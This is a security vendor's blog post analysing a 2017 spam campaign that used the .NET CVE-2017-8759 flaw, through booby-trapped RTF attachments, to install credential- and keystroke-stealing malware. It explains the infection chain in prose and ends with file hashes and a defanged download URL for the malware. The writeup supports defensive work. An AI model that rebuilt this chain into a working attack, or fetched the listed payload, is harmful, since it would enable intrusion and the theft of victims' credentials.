• News
  • Security
  • Products
  • About Seqrite
Seqrite Blog Blog
  • News
  • Security
  • Products
  • About Seqrite
Home  /  Uncategorized  /  A recent .NET Framework zero day Vulnerability (CVE-2017-8759) is dropping Infostealer malware- An analysis by Quick Heal Security Labs
16 October 2017

A recent .NET Framework zero day Vulnerability (CVE-2017-8759) is dropping Infostealer malware- An analysis by Quick Heal Security Labs

Written by Pradeep Kulkarni
Pradeep Kulkarni
Uncategorized
Estimated reading time: 4 minutes

.NET Framework Remote Code Execution Vulnerability (CVE-2017-8759) is a code injection vulnerability in the SOAP WSDL parser of .net framework. This vulnerability was a zero-day when it was spotted in the wild. Quick Heal Security Labs had released advisory in the month of September 2017 to address it. This vulnerability when exploited allows attacker to inject and execute remote code when WSDL parser handles the malicious SOAP response. This vulnerability was patched by Microsoft on 12th Sep 2017. Quick Heal Security Lab is observing an ongoing malspam campaign which is exploiting this vulnerability, this malspam campaign makes use of malicious RTF file as attachment exploiting CVE-2017-8759 to deliver Infostealer malware.

Attack Chain

1

Fig 1. Attack Chain

Technical details

This vulnerability (CVE-2017-8759) triggers due to improper handling of SOAP WSDL response and leads to remote code execution. Attackers are using crafted RTF files to exploit the vulnerability. This RTF file contains an embedded OLE object contains SOAP Moniker CLSID and link to remotely hosted SOAP WSDL definition file as shown in Fig 2. In this case, attacker had hosted all payloads on the compromised WordPress website.

2

Fig 2. RTF doc with embedded OLE object points to WSDL SOAP definition

RTF exploit analysis

The attack in this campaign starts with a spam email with the exploit RTF doc as an attachment. This RTF file has similar contents as shown in fig 2. When RTF is opened by winword.exe, it issues request to malicious SOAP WSDL definition from compromised website as shown in Fig 3.

3

Fig 3. HTTP Request to SOAP WSDL definition

In response WSDL definition get downloaded and processed by WSDL parser module. As shown in below fig 4.

4

Fig 4. SOAP WSDL response with injected code

Fig 4. Shows injected code which is executed by WSDL SOAP parser. Due to lack of proper validation it executes injected code. It then downloads and executes remotely hosted “toZ.hta” file with the help of “mshta.exe”. This .hta script is obfuscated, Fig 5 shows obfuscated script and Fig 6 shows script after deobfuscation.

5

Fig 5 Obfuscated HTA script

6

Fig 6 Deobfucated part of HTA script

As shown in deobfuscated script powershell.exe is executed to download and execute malware “Image0072.exe” from the  compromised website.

Payload Analysis

The downloaded “Image0072.exe” is .NET executable obfuscated with custom obfuscator. It hides two malicious component inside bitmap resources in the form of compressed and encrypted data. Upon execution it decrypts and decompresses the first module ‘rp.dll’. The second module which is actually an Infostealer is decrypted and decompressed by rp.dll. This second module is created with a random name.

Overview of Infostealer Components

7

Fig 7. Malware Components

rp.dll component

It copies “Image0072.exe” in %APPDATA% and sets it for auto-execution by creating “run” entry in the registry. It creates a new process with the name “Image0072.exe”. Then it decrypts and decompresses the <random name>.exe component and injects it into newly created process i.e “Image0072.exe”.

<random name>.exe

This component performs the actual tasks of Infostealer. It steals the victim’s credentials saved in browsers, keystrokes and takes screen shots. The stolen data is then sent to the attacker through e-mail or by FTP. While doing the analysis we did not see the stolen data sent over FTP but we found out e-mail address and its credentials on which the data was being pushed.

To make the analysis part difficult the raw strings related to stealing activity were kept encrypted using AES algorithm.

The multistage operation, obfuscation, encryption and compression, anti-vm techniques are used to hinder the analysis and bypass static detection.

Stolen data at attacker mailbox

Following images shows stolen data at attacker’s mailbox.

8

Fig 8. Attacker’s Mailbox

9

Fig 9. Stolen user credentials

10

Fig 10. Stolen Keystrokes

Thus the victim’s activity is continuously monitored and recorded by the malware and sent to the attacker.

This is another incident where we have seen recent zero-day exploits being integrated rapidly in ongoing malicious campaigns. We strongly advice our users to stay protected by applying latest security updates released by Microsoft and by keeping Quick Heal/Seqrite updated with latest updates.

Indicators of compromise

9A8DE9ABC33FD8EE8BCA3D3673A92915
BEF17C7B359BCA2285311FB335951DD4
bali-accommodation[.]co/wp-admin/Image0072[.]exe

Also Read

http://blogs.quickheal.com/cve-2017-8759-net-framework-remote-code-execution-vulnerability-analysis-quick-heal-security-labs/

http://www.seqrite.com/blog/cve-2017-8759-net-framework-remote-code-execution-vulnerability/

Subject Matter Experts

  • Pawan Chaudhari, Amar Patil, Aniruddha Dolas | Quick Heal Security Labs

 Previous PostHacking requires exceptional skills: How can IT security pros sta...
Next Post  Strategies to mitigate risks of false positives in cybersecurity
Pradeep Kulkarni
About Pradeep Kulkarni

Pradeep Kulkarni is leading the IPS team in Quick Heal Technologies Limited. Having worked in the IT security industry for over 11 years, he has worked on various...

Articles by Pradeep Kulkarni »

Related Posts

  • Gorgon APT fractures India’s Industrial Backbone

    Gorgon APT targeting MSME sector in India

    August 10, 2020
  • Way Out of The MAZE: A Quick Guide For Defending Against Maze Ransomware

    May 21, 2020
  • The-need-for-businesses-to-empower-the-CISO

    Why do boards need to empower their CISO?

    October 22, 2019

No Comments

Leave a Reply.Your email address will not be published.

Cancel reply

CAPTCHA Image
Refresh Image

Popular Posts

  • Turn the Page: Cybersecurity Predictions for 2021 & beyond Turn the Page: Cybersecurity Predictions for 2021 & beyond February 18, 2021
  • The Data breach inferno burning big-ticket businesses The Data breach inferno burning big-ticket businesses February 5, 2021
  • Pharma Sector needs to streamline its insides to avoid cyberattacks Pharma Sector needs to streamline its insides to avoid cyberattacks February 12, 2021

Featured Authors

  • Seqrite
    Seqrite

    Follow us for the latest updates and insights related to security for...

    Read more..
  • Viraj Talikotkar
    Viraj Talikotkar

    Viraj is a Lead Technical Writer at Quick Heal Technologies. He is always on...

    Read more..
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar is the Joint Managing Director and Chief Technology Officer of...

    Read more..

Latest Posts

  • Businesses now worried about the surge in COVID-19 infodemic

    Businesses now worried about the surge in COVID-19 infodemic

    February 26, 2021
  • Turn the Page: Cybersecurity Predictions for 2021 & beyond

    Turn the Page: Cybersecurity Predictions for 2021 & beyond

    February 18, 2021
  • Pharma Sector needs to streamline its insides to avoid cyberattacks

    Pharma Sector needs to streamline its insides to avoid cyberattacks

    February 12, 2021

Stay Updated!

Topics

Antivirus For Linux (10) apt (9) BYOD (9) COVID-19 (10) Cyber-attack (31) cyber-attacks (56) cyberattacks (12) Cybersecurity (279) cyber security (25) Cyber threat (29) cyber threats (44) Data (11) data breach (50) data breaches (27) data loss (28) data loss prevention (33) data protection (21) data security (13) DLP (49) Encryption (16) endpoint security (102) Enterprise security (14) EPS (9) Exploit (12) firewall (11) hackers (9) IoT (10) malware (58) malware attack (22) malware attacks (12) MDM (25) mobile device management (9) Network security (18) Patch Management (12) phishing (16) Ransomware (56) ransomware attack (29) ransomware attacks (30) ransomware protection (12) Seqrite (24) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) UTM (34) Vulnerability (10)

Products

  • Endpoint Security (EPS)
  • Seqrite Encryption Manager
  • Seqrite Endpoint Security Cloud
  • Cloud Security
  • Seqrite mSuite
  • Seqrite MobiSMART
  • Unified Threat Management
  • Seqrite Secure Web Gateway
  • Antivirus for Server
  • Antivirus for Linux

Resources

  • White Papers
  • Datasheets
  • Threat Reports
  • Manuals
  • Case Studies

About Us

  • Company Overview
  • Leadership
  • Why choose SEQRITE?
  • Awards & Certifications
  • Newsroom

Archives

  • By Date
  • By Category

© 2020 Quick Heal Technologies Ltd. (Formerly Known as Quick Heal Technologies Pvt. Ltd.) Cookie Policies Privacy Policies

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website.
By browsing this website, you agree to our cookie policy.